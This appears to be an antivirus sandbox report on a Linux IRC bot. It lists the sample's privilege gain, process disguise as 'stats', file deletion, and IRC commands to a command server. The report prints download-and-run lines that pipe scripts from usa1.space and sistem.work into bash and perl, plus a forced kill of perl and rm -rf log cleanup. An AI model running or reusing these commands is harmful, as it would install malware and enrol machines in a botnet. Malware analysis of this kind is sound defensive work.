Technical Information
Malicious functions:
Gains root privileges
Substitutes application name for:
- [stats]
Launches processes:
- wget -O - usa1.space/bot/bash
- bash
- ps x
- grep stats
- grep -v grep
- wget -O - sistem.work/irc
- perl
- uname -a
- rm -rf ck.log
Attempts to kill the following processes:
- killall -9 /usr/bin/perl
Performs operations with the file system:
Creates or modifies files:
- /root/ck.log
Deletes files:
- /tmp/ck.log
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
HTTP GET requests:
- us##.#pace/bot/bash
- si###m.work/irc
Connects to the following servers over the IRC protocol:
- Server: 13#.#9.45.149; Command: NICK b\n
- Server: 13#.#9.45.149; Command: USER b 19#.#68.208.50 usa1.space :Linux box-amd64 3.16.7-ckt20 #2 SMP Sun Mar 20 12:22:57 MSK 2016 x86_64 GNU/Linux\n\n
- Server: 13#.#9.45.149; Command: NICK b10417-\n
- Server: 13#.#9.45.149; Command: PONG :766CDBCE\n
- Server: 13#.#9.45.149; Command: JOIN #china muietie\n
DNS ASK:
- us##.space
- si##em.work
Other:
Collects CPU information
Collects RAM information